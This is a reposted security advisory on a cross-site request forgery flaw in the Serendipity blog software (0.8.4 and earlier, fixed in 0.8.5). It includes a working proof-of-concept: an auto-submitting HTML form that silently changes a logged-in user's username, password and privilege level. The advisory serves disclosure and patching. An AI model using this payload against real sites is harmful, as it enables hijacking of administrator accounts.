[转载]Serendipity Account Hijacking and CSRF Vulnerability

文章作者：Nenad Jovanovic

Summary
Serendipity is "a weblog/blog system, implemented with PHP. It is standards compliant, feature rich and open source (BSD License)".



A security vulnerability have been discovered in Serendipity that allow accounts to be hijacked by utilizing a CSRF technique.

Credit:
The information has been provided by Nenad Jovanovic.

Details
Vulnerable Systems:
* Serendipity versions 0.8.4 and prior

Immune Systems:
* Serendipity version 0.8.5

An attacker is able to change the username and password of a logged-in user (and can therefore hijack his account) by tricking the user into clicking a link to a page with the following contents:

<form
action="http://your-server/path-to-s9y/serendipity_admin.php? serendipity[adminModule]=personal &serendipity[adminAction]=save"
method="post">
<input type="text" name="username" value="evilguy" />
<input type="text" name="password" value="evilpass" />
<input type="text" name="realname" value="John Doe" />
<input type="text" name="userlevel" value="255"/>
<input type="text" name="email" value="john@example.com" />
<input type="text" name="lang" value="en"/>
<input type="submit" name="SAVE" value="Save" />
</form>

<script type="text/javascript">
document.forms[0].submit();
</script>

The fields "your-server" and "path-to-s9y" in the form&#39;s action attribute have to be adjusted accordingly.

Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be launched for performing other requests disguised as the victim. However, this problem is not limited to Serendipity, but affects a large number of comparable web applications available at this time.

Solution:
Version 0.8.5 of Serendipity is reported by the developers to fix the Account Hijacking vulnerability as well as the general CSRF problem itself.